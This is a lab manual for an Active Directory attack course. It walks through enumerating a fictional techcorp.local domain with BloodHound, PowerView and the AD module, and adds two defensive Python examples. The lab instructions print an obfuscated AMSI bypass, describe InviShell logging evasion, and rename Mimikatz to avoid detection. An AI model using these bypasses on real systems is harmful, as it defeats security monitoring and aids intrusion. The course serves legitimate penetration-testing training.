Active Directory Attacks – Advanced Edition
Lab Manual
Table of Contents
Lab Instructions ............................................................................................................................................. 3
Hands-On 1: .................................................................................................................................................. 4
BloodHound .............................................................................................................................................. 4
AD Module ................................................................................................................................................ 6
Hands-On 2: ................................................................................................................................................ 12
Hands-On 3: ................................................................................................................................................ 16
Hands-On 4: ................................................................................................................................................ 19
Hands-On 5: ................................................................................................................................................ 24
PowerUp ................................................................................................................................................. 24
AccessChk................................................................................................................................................ 25
BloodHound ............................................................................................................................................ 29
Hands-On 6: ................................................................................................................................................ 30
Rubeus and John the Ripper ................................................................................................................... 31
KerberosRequestorSecurityToken.NET class from PowerShell, Mimikatz and tgsrepcrack.py .............. 32
Hands-On 7: ................................................................................................................................................ 34
Hands-On 8: ................................................................................................................................................ 37
Hands-On 9: ................................................................................................................................................ 40
winrs and open-source binaries .............................................................................................................. 40
PowerShell Remoting and Invoke-Mimi ................................................................................................. 42
Hands-On 10: .............................................................................................................................................. 44
Use winrs to access us-jump ................................................................................................................... 46
Hands-On 11: .............................................................................................................................................. 55
Copy Rubeus using xcopy and execute using winrs ................................................................................ 57
Copy and execute Rubeus using PowerShell Remoting .......................................................................... 57
Hands-On 12: .............................................................................................................................................. 61
Hands-On 13: .............................................................................................................................................. 63
Hands-On 14: .............................................................................................................................................. 69
Without using Invoke-Mimi.ps1.............................................................................................................. 69
Using Invoke-Mimi.ps1and PowerShell Remoting .................................................................................. 71
Hands-On 15: .............................................................................................................................................. 73
Hands-On 16: .............................................................................................................................................. 76
Hands-On 17: .............................................................................................................................................. 79
Hands-On 18: .............................................................................................................................................. 85
Hands-on 19: ............................................................................................................................................... 88
Hands-On 20: .............................................................................................................................................. 92
Hands-On 21: .............................................................................................................................................. 95
Hands-On 22: .............................................................................................................................................. 97
Hands-on 23: ............................................................................................................................................... 99
Hands-on 24: ............................................................................................................................................. 102
Hands-on 25: ............................................................................................................................................. 106
Access eushare on euvendor-dc ........................................................................................................... 106
Access euvendor-net using PowerShell Remoting................................................................................ 110
Hands-On 26: ............................................................................................................................................ 113
Hands-On 27: ............................................................................................................................................ 120
Hands-On 28: ............................................................................................................................................ 124

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 2


Lab Instructions
• You can use a web browser or OpenVPN client to access the lab. See the 'Connecting to lab'
document for more details.
• Unless specified otherwise, all the PowerShell based tools (especially those used for enumeration)
are executed using InvisiShell to avoid verbose logging. Binaries like Rubeus.exe may behave inconsistently
when used from InvisiShell; run them from the normal command prompt.
• The lab manual uses a terminology for user specific resources. For example, if you see studentuserx
and your user ID is studentuser34, read studentuserx as studentuser34, supportxuser as
support34user and so on.
• All the tools used in the lab are available in the C:\AD directory of your student VM.
• The C:\AD directory is exempted from Windows Defender but AMSI may detect some tools when
you load them. The lab manual uses the following AMSI bypass:
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE](
"{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' )
-VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'
),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )
• Always double check the NTLM hash and AES keys! They may be different in your lab instance.
• The Invoke-Mimikatz.ps1 file is renamed to Invoke-Mimi.ps1, and the Invoke-Mimikatz function is
renamed to Invoke-Mimi, to avoid detection.
• In Mimikatz, SafetyKatz and BetterSafetyKatz the “ekeys” command is modified to “keys” and the “pth”
command is modified to “opassth” to avoid detection. However, both forms of the commands still work
with all the binaries.
• Please do not attack out-of-scope machines or your fellow students' machines. Please do not
tamper with or delete other students’ files from network directories.

Hands-On 1:
Task
• Enumerate the following for the us.techcorp.local domain:
− Users
− Computers
− Domain Administrators
− Enterprise Administrators
− Kerberos Policy

Solution
We can use Microsoft's ActiveDirectory module, BloodHound, PowerView or SharpView to enumerate
the domain. Please note that all the enumeration can be done with any other tool of your choice as well.

BloodHound
BloodHound uses the neo4j graph database, which is already installed and running on your VM. To set up
BloodHound, unzip both BloodHound archives in C:\AD\Tools.

Now, open BloodHound from C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64 and provide the following details:
bolt://localhost:7687
Username: neo4j
Password: Pass@123

Run the following commands to gather data and information from the current domain:

PS C:\Users\studentuserx> cd C:\AD\Tools\BloodHound-master\Collectors
C:\AD\Tools\BloodHound-master\Collectors>SharpHound.exe --CollectionMethod All
-----------------------------------------------
Initializing SharpHound at 3:36 AM on 11/17/2021
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain US.TECHCORP.LOCAL using path CN=Schema,CN=Configuration,DC=techcorp,DC=local
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 22 MB RAM
[+] Creating Schema map for domain TECHCORP.LOCAL using path CN=Schema,CN=Configuration,DC=techcorp,DC=local
[+] Creating Schema map for domain TECHCORP.LOCAL using path CN=Schema,CN=Configuration,DC=techcorp,DC=local
[+] Creating Schema map for domain TECHCORP.LOCAL using path CN=Schema,CN=Configuration,DC=techcorp,DC=local
Status: 165 objects finished (+165 82.5)/s -- Using 34 MB RAM
Enumeration finished in 00:00:02.7109867
Compressing data to .\20211117033637_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:36 AM on 11/17/2021! Happy Graphing!

We can upload or drag-and-drop the zip archive into the BloodHound application for analysis. Press the Ctrl key
to toggle node labeling.

You can run Pre-Built or Custom queries after uploading the data. Below is an example of the built-in
query 'Find Shortest Paths to Domain Admins'.

Solving the individual Hands-On tasks using BloodHound is left to you.

Note: Exit the BloodHound application once you have stopped using it, as it uses a good amount of RAM. You
may also like to stop the neo4j service if you are not using BloodHound.

AD Module
Let's start a PowerShell session using InvisiShell to avoid verbose logging. We will use Microsoft's AD
Module for solving the tasks of this Hands-On:

C:\Users\studentuserx>cd C:\AD\Tools\

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS C:\AD\Tools> Get-ADUser -Filter *

DistinguishedName : CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : True
GivenName :
Name : Administrator
ObjectClass : user
ObjectGUID : 6065fe62-0dcb-4a5e-bcad-e99f2dec4cdd
SamAccountName : Administrator
SID : S-1-5-21-210670787-2521448726-163245708-500
Surname :
UserPrincipalName :

DistinguishedName : CN=Guest,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : False
GivenName :
Name : Guest
ObjectClass : user
ObjectGUID : 5bc636ba-fa0f-4efe-b50e-de8ca1294598
SamAccountName : Guest
SID : S-1-5-21-210670787-2521448726-163245708-501
Surname :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 6dce7bd9-287f-4ab3-b5ba-0bb1e8aab391
SamAccountName : krbtgt
SID : S-1-5-21-210670787-2521448726-163245708-502
Surname :
UserPrincipalName :

DistinguishedName : CN=TECHCORP$,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : True
[snip]

To list a specific property of all the users, say, samaccountname:

PS C:\AD\Tools> Get-ADUser -Filter * | Select -ExpandProperty samaccountname

Administrator
Guest
krbtgt
TECHCORP$
emptest
adconnect
mgmtadmin
helpdeskadmin
dbservice
atauser
exchangeadmin
HealthMailbox3bd1057
[snip]

Now, to enumerate member computers in the domain we can use Get-ADComputer:

PS C:\AD\Tools> Get-ADComputer -Filter * | select -expand name


US-DC
US-EXCHANGE
US-MGMT
US-HELPDESK
US-MSSQL
US-MAILMGMT
US-JUMP
US-WEB
US-ADCONNECT
STUDENT2
STUDENT1
[snip]

To see attributes of the Domain Admins group:

PS C:\AD\Tools> Get-ADGroup -Identity 'Domain Admins' -Properties *

adminCount : 1
CanonicalName : us.techcorp.local/Users/Domain Admins
CN : Domain Admins
Created : 7/5/2019 12:49:17 AM
createTimeStamp : 7/5/2019 12:49:17 AM
Deleted :
Description : Designated administrators of the domain
DisplayName :
DistinguishedName : CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local
dSCorePropagationData : {7/10/2019 9:53:40 AM, 7/10/2019 9:00:03 AM, 7/6/2019 9:11:13 PM, 7/6/2019 3:04:32 AM...}
GroupCategory : Security
GroupScope : Global
groupType : -2147483646
HomePage :
instanceType : 4
isCriticalSystemObject : True
isDeleted :
LastKnownParent :
ManagedBy :
member : {CN=decda,CN=Users,DC=us,DC=techcorp,DC=local, CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local}
MemberOf : {CN=Denied RODC Password Replication Group,CN=Users,DC=us,DC=techcorp,DC=local, CN=Administrators,CN=Builtin,DC=us,DC=techcorp,DC=local}
Members : {CN=decda,CN=Users,DC=us,DC=techcorp,DC=local, CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local}
Modified : 7/19/2019 12:16:32 PM
modifyTimeStamp : 7/19/2019 12:16:32 PM
Name : Domain Admins
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Group,CN=Schema,CN=Configuration,DC=techcorp,DC=local
ObjectClass : group
ObjectGUID : 218cc77d-0e1c-41ed-91b2-730f6279c325
objectSid : S-1-5-21-210670787-2521448726-163245708-512
ProtectedFromAccidentalDeletion : False
SamAccountName : Domain Admins
sAMAccountType : 268435456
sDRightsEffective : 0
SID : S-1-5-21-210670787-2521448726-163245708-512
SIDHistory : {}
uSNChanged : 282184
uSNCreated : 12315
whenChanged : 7/19/2019 12:16:32 PM
whenCreated : 7/5/2019 12:49:17 AM

To enumerate members of the Domain Admins group:

PS C:\AD\Tools> Get-ADGroupMember -Identity 'Domain Admins'

distinguishedName : CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local
name : Administrator
objectClass : user
objectGUID : 6065fe62-0dcb-4a5e-bcad-e99f2dec4cdd
SamAccountName : Administrator
SID : S-1-5-21-210670787-2521448726-163245708-500

distinguishedName : CN=decda,CN=Users,DC=us,DC=techcorp,DC=local
name : decda
objectClass : user
objectGUID : 0dfb0572-730c-432e-9404-769e0584bd95
SamAccountName : decda
SID : S-1-5-21-210670787-2521448726-163245708-1289

To enumerate members of the Enterprise Admins group:

PS C:\AD\Tools> Get-ADGroupMember -Identity 'Enterprise Admins'

Get-ADGroupMember : Cannot find an object with identity: 'Enterprise Admins' under: 'DC=us,DC=techcorp,DC=local'.
[snip]

Since our current domain (us.techcorp.local) is not the forest root domain, the above command returns an
error. We need to query the root domain, as the Enterprise Admins group exists only in the root domain of a
forest.

PS C:\AD\Tools> Get-ADGroupMember -Identity 'Enterprise Admins' -Server techcorp.local

distinguishedName : CN=Administrator,CN=Users,DC=techcorp,DC=local
name : Administrator
objectClass : user
objectGUID : a8ee80ca-edc5-4c5d-a210-b58ca11bd055
SamAccountName : Administrator
SID : S-1-5-21-2781415573-3701854478-2406986946-500

Let’s move on to the last task of this hands-on. To find the Kerberos policy, let's use PowerView:

C:\Users\studentuserx>cd C:\AD\Tools\

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\AD\Tools> . C:\AD\Tools\PowerView.ps1
PS C:\AD\Tools> (Get-DomainPolicy).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1
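
Both InviShell setups in this Hands-On work the same way: COR_ENABLE_PROFILING and COR_PROFILER tell the .NET runtime to load a profiler identified by CLSID, and the REG ADD lines register that CLSID under HKCU so the runtime resolves it to InShellProf.dll without administrative rights. For a defender that combination is the detection opportunity: a per-user CLSID InprocServer32 write that points at a DLL outside Windows or Program Files, followed by a PowerShell process started with matching profiler variables (tracked by MITRE ATT&CK as T1574.012). The Python below is an added example written for this page, not part of the course material or of InviShell; the event records, their field names and the vendor CLSID in the benign case are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Per-user COM registration of a CLSID. InviShell registers its profiler here so
# that the CLR, told via COR_PROFILER which CLSID to load, finds InShellProf.dll.
CLSID_INPROC_RE = re.compile(
    r"^HKCU\\Software\\Classes\\CLSID\\(\{[0-9A-Fa-f-]{36}\})\\InprocServer32$",
    re.IGNORECASE,
)
# Directories an ordinary user cannot write to; a profiler DLL outside them is
# the interesting case for this heuristic.
PROTECTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed event records (field names are this example's own, not a product's
# log schema). The first two mirror the InviShell setup shown in this Hands-On.
CONSTRUCTED_EVENTS: List[Dict] = [
    {"type": "reg_set", "user": "studentuser34", "process": "reg.exe",
     "key": r"HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32",
     "value_name": "(Default)", "data": r"C:\AD\Tools\InviShell\InShellProf.dll"},
    {"type": "proc_create", "user": "studentuser34",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "env": {"COR_ENABLE_PROFILING": "1",
             "COR_PROFILER": "{cf0d821e-299b-5307-a3d8-b283c03916db}"}},
    # Benign comparison: a vendor profiler registered machine-wide by an installer
    # (CLSID and path are placeholders).
    {"type": "reg_set", "user": "SYSTEM", "process": "msiexec.exe",
     "key": r"HKLM\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32",
     "value_name": "(Default)", "data": r"C:\Program Files\Vendor\Profiler.dll"},
    {"type": "proc_create", "user": "studentuser34",
     "image": r"C:\Windows\System32\cmd.exe", "env": {}},
]


def outside_protected_dirs(path: str) -> bool:
    """True when the DLL path is not under Windows or Program Files."""
    return not path.lower().startswith(PROTECTED_DIRS)


def detect_clr_profiler_hijack(events: List[Dict]) -> List[Dict]:
    """Correlate user-hive CLSID registrations with CLR profiler environment
    variables on process creation (MITRE ATT&CK T1574.012, COR_PROFILER)."""
    alerts: List[Dict] = []
    user_hive_servers: Dict[str, str] = {}  # lower-cased CLSID -> DLL path
    for ev in events:
        if ev["type"] == "reg_set":
            m = CLSID_INPROC_RE.match(ev["key"])
            if not m or ev.get("value_name") != "(Default)":
                continue
            data = ev.get("data", "")
            if not data.lower().endswith(".dll"):
                continue
            clsid = m.group(1).lower()
            user_hive_servers[clsid] = data
            alerts.append({
                "rule": "user-hive COM InprocServer32 registration",
                "severity": "medium" if outside_protected_dirs(data) else "low",
                "user": ev["user"], "clsid": clsid, "dll": data,
            })
        elif ev["type"] == "proc_create":
            env = ev.get("env") or {}
            if env.get("COR_ENABLE_PROFILING") != "1" or "COR_PROFILER" not in env:
                continue
            clsid = env["COR_PROFILER"].lower()
            dll: Optional[str] = user_hive_servers.get(clsid)
            alerts.append({
                "rule": "CLR profiler requested via environment (T1574.012)",
                # High when the profiler CLSID resolves to a DLL this user registered
                # in their own hive: the runtime will load that DLL into the process.
                "severity": "high" if dll else "medium",
                "user": ev["user"], "image": ev["image"], "clsid": clsid, "dll": dll,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_clr_profiler_hijack(CONSTRUCTED_EVENTS):
        print(alert)
```

The two rules are deliberately kept separate: the registry rule alone has benign matches (per-user COM servers do exist), and the environment rule alone fires on legitimate profiling tools, so only the correlation of a user-hive CLSID with a process that asks the CLR to load it is scored high. The HKLM registration in the sample is not matched, which is the intended behaviour for installer-deployed profilers.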

Hands-On 2:
Task
• Enumerate the following for the us.techcorp.local domain:
− Restricted Groups from GPO
− Membership of the restricted groups
− List all the OUs
− List all the computers in the Students OU.
− List the GPOs
− Enumerate GPO applied on the Students OU.

Solution
We can continue using PowerView from InvisiShell to enumerate GPOs. To enumerate Restricted Groups
configured through GPO:

PS C:\AD\Tools> Get-DomainGPOLocalGroup

GPODisplayName : Mgmt
GPOName : {B78BFC6B-76DB-4AA4-9CF6-26260697A8F9}
GPOPath : \\us.techcorp.local\SysVol\us.techcorp.local\Policies\{B78BFC6B-76DB-4AA4-9CF6-26260697A8F9}
GPOType : RestrictedGroups
Filters :
GroupName : US\machineadmins
GroupSID : S-1-5-21-210670787-2521448726-163245708-1118
GroupMemberOf : {S-1-5-32-544}
GroupMembers : {}

Now, to look for the membership of the restricted group 'machineadmins', we can use Get-DomainGroupMember
from PowerView or Get-ADGroupMember from the AD module:

PS C:\AD\Tools> Get-DomainGroupMember -Identity machineadmins

The group seems to have no members.

Next, use Get-DomainOU or Get-ADOrganizationalUnit to list all the OUs:

PS C:\AD\Tools> Get-DomainOU
usncreated : 7925
systemflags : -1946157056
iscriticalsystemobject : True
gplink : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=us,DC=techcorp,DC=local;0]
whenchanged : 7/5/2019 7:48:21 AM
objectclass : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged : 7925
dscorepropagationdata : {1/9/2021 7:03:02 AM, 1/9/2021 7:03:02 AM, 1/9/2021 7:03:02 AM, 7/30/2019 12:40:16 PM...}
name : Domain Controllers
description : Default container for domain controllers
distinguishedname : OU=Domain Controllers,DC=us,DC=techcorp,DC=local
ou : Domain Controllers
whencreated : 7/5/2019 7:48:21 AM
instancetype : 4
objectguid : fc0dd146-a66e-45cc-83ae-9e5a0c39ed91
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=techcorp,DC=local
[snip]

Now, to list all the computers in the Students OU:

PS C:\AD\Tools> (Get-DomainOU -Identity Students).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

name
----
STUDENT11
STUDENT12
[snip]

To list the computers in the OU using the ActiveDirectory module:

PS C:\AD\Tools> Get-ADOrganizationalUnit -Identity 'OU=StudentsMachines,DC=us,DC=techcorp,DC=local' | %{Get-ADComputer -SearchBase $_ -Filter *} | select name
[snip]

Next task is to list the GPOs. Use the below PowerView command:

PS C:\AD\Tools> Get-DomainGPO
usncreated : 7793
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 7/20/2019 11:35:15 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 329583
dscorepropagationdata : {7/30/2019 12:35:19 PM, 7/10/2019 4:00:03 PM, 7/10/2019 4:00:03 PM, 7/7/2019 4:11:13 AM...}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\us.techcorp.local\sysvol\us.techcorp.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=us,DC=techcorp,DC=local
whencreated : 7/5/2019 7:48:21 AM
versionnumber : 6
instancetype : 4
objectguid : d0907c7b-9e3e-42e9-ba50-ac23ea8bb598
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=techcorp,DC=local
[snip]

To enumerate GPO applied on the Students OU:

PS C:\AD\Tools> (Get-DomainOU -Identity Students).gplink

[LDAP://cn={FCE16496-C744-4E46-AC89-2D01D76EAD68},cn=policies,cn=system,DC=us,DC=techcorp,DC=local;0]

PS C:\AD\Tools> Get-DomainGPO -Identity '{FCE16496-C744-4E46-AC89-2D01D76EAD68}'

usncreated : 330304
displayname : StudentPolicies
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 7/20/2019 2:17:57 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 338463
dscorepropagationdata : {7/30/2019 12:35:19 PM, 1/1/1601 12:00:00 AM}
name : {FCE16496-C744-4E46-AC89-2D01D76EAD68}
flags : 0
cn : {FCE16496-C744-4E46-AC89-2D01D76EAD68}
gpcfilesyspath : \\us.techcorp.local\SysVol\us.techcorp.local\Policies\{FCE16496-C744-4E46-AC89-2D01D76EAD68}
distinguishedname : CN={FCE16496-C744-4E46-AC89-2D01D76EAD68},CN=Policies,CN=System,DC=us,DC=techcorp,DC=local
whencreated : 7/20/2019 11:48:51 AM
versionnumber : 4
instancetype : 4
objectguid : b9bb82a1-5cc2-4264-b4f4-bdf6a238817b
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=techcorp,DC=local
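
The gplink attribute read in this Hands-On is a single string of one or more [LDAP://<GPO DN>;<options>] entries; above, the Students OU's link was read by eye and the GPO then fetched by its GUID with Get-DomainGPO. As an added example (not code from the course or from PowerView), the following Python parses a gPLink value into its linked GPOs, extracts the GUID that Get-DomainGPO -Identity expects, and decodes the options field, in which bit 0x1 marks a disabled link and bit 0x2 an enforced one. The two real values are the gplink strings printed above; the two-link value and its GUIDs are constructed to exercise the flags.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# One gPLink entry: "[LDAP://<GPO distinguished name>;<options>]", repeated back to back.
GPLINK_ENTRY_RE = re.compile(r"\[LDAP://([^;\]]+);(\d+)\]", re.IGNORECASE)
# The GPO's GUID is the CN of the first RDN of that distinguished name.
GPO_GUID_RE = re.compile(r"^cn=(\{[0-9A-Fa-f-]{36}\})", re.IGNORECASE)

# Well-known GPO GUIDs seen in this Hands-On: the first is named in the Get-DomainGPO
# output above, the second is the default policy linked to the Domain Controllers OU.
WELL_KNOWN_GPOS: Dict[str, str] = {
    "{31B2F340-016D-11D2-945F-00C04FB984F9}": "Default Domain Policy",
    "{6AC1786C-016F-11D2-945F-00C04FB984F9}": "Default Domain Controllers Policy",
}

# gplink values printed above for the Domain Controllers OU and the Students OU.
DC_OU_GPLINK = "[LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=us,DC=techcorp,DC=local;0]"
STUDENTS_OU_GPLINK = "[LDAP://cn={FCE16496-C744-4E46-AC89-2D01D76EAD68},cn=policies,cn=system,DC=us,DC=techcorp,DC=local;0]"
# Constructed value with two links to exercise the option bits (GUIDs and domain are placeholders).
CONSTRUCTED_GPLINK = (
    "[LDAP://cn={AAAAAAAA-0000-0000-0000-000000000001},cn=policies,cn=system,DC=example,DC=test;2]"
    "[LDAP://cn={AAAAAAAA-0000-0000-0000-000000000002},cn=policies,cn=system,DC=example,DC=test;1]"
)


@dataclass(frozen=True)
class GpoLink:
    dn: str
    guid: str
    disabled: bool        # options bit 0x1: link present but not applied
    enforced: bool        # options bit 0x2: link cannot be blocked by child OUs
    display_name: str


def parse_gplink(gplink: str) -> List[GpoLink]:
    """Split a gPLink attribute value into its individual GPO links."""
    links: List[GpoLink] = []
    for dn, options in GPLINK_ENTRY_RE.findall(gplink or ""):
        m = GPO_GUID_RE.match(dn)
        if not m:
            raise ValueError(f"gPLink entry without a GPO GUID: {dn}")
        guid = m.group(1).upper()
        opts = int(options)
        links.append(GpoLink(
            dn=dn, guid=guid,
            disabled=bool(opts & 0x1), enforced=bool(opts & 0x2),
            display_name=WELL_KNOWN_GPOS.get(guid, "(resolve with Get-DomainGPO -Identity)"),
        ))
    return links


def applied_gpo_guids(gplink: str) -> List[str]:
    """GUIDs of the links that are actually applied, i.e. not disabled."""
    return [link.guid for link in parse_gplink(gplink) if not link.disabled]


if __name__ == "__main__":
    for ou, value in (("Domain Controllers", DC_OU_GPLINK), ("Students", STUDENTS_OU_GPLINK)):
        for link in parse_gplink(value):
            state = "disabled" if link.disabled else ("enforced" if link.enforced else "enabled")
            print(f"{ou}: {link.guid} {link.display_name} [{state}]")
```

For the Students OU the options value is 0, so the StudentPolicies link is enabled and not enforced; a link ending in ";1" would be present in the attribute but have no effect, which matters when reviewing which policies actually reach a machine.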

Hands-On 3:
Task
• Enumerate the following for the us.techcorp.local domain:
− ACL for the Domain Admins group
− All modify rights/permissions for the studentuserx

Solution
To enumerate ACLs, we can use Get-ObjectACL from PowerView or Get-ACL with the AD:\ PSProvider from
the ActiveDirectory module.

Using PowerView from InvisiShell:

PS C:\AD\Tools> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/DC=techcorp,DC=local
VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=krbtgt)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/CN=Schema,CN=Configuration,DC=techcorp,DC=local
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/CN=Extended-Rights,CN=Configuration,DC=techcorp,DC=local
VERBOSE: [Get-DomainObjectAcl] Get-DomainObjectAcl filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren
ObjectAceType : ms-Exch-Active-Sync-Devices
ObjectSID : S-1-5-21-210670787-2521448726-163245708-512
InheritanceFlags : ContainerInherit
BinaryLength : 72
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-21-2781415573-3701854478-2406986946-1119
AccessMask : 7
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit, InheritOnly
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
[snip]

Same task by using ActiveDirectory module from InvisiShell:

PS C:\AD\Tools> Get-ACL 'AD:\CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local' | select -ExpandProperty Access
ActiveDirectoryRights : GenericRead
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited : False
InheritanceFlags : None
PropagationFlags : None

ActiveDirectoryRights : GenericAll
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : NT AUTHORITY\SYSTEM
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
[snip]

Now, to check for modify rights/permissions for studentuserx, we can use Find-InterestingDomainACL
from PowerView. In the below command we filter the results for studentuserx. Please note that the below
command may take very long to complete:

PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "studentuserx"}

We don't get any output. This means studentuserx has no modify permissions on any object in the domain.

Let's try the same for the StudentUsers group. Please note that the below command may take very long to
complete:

PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}
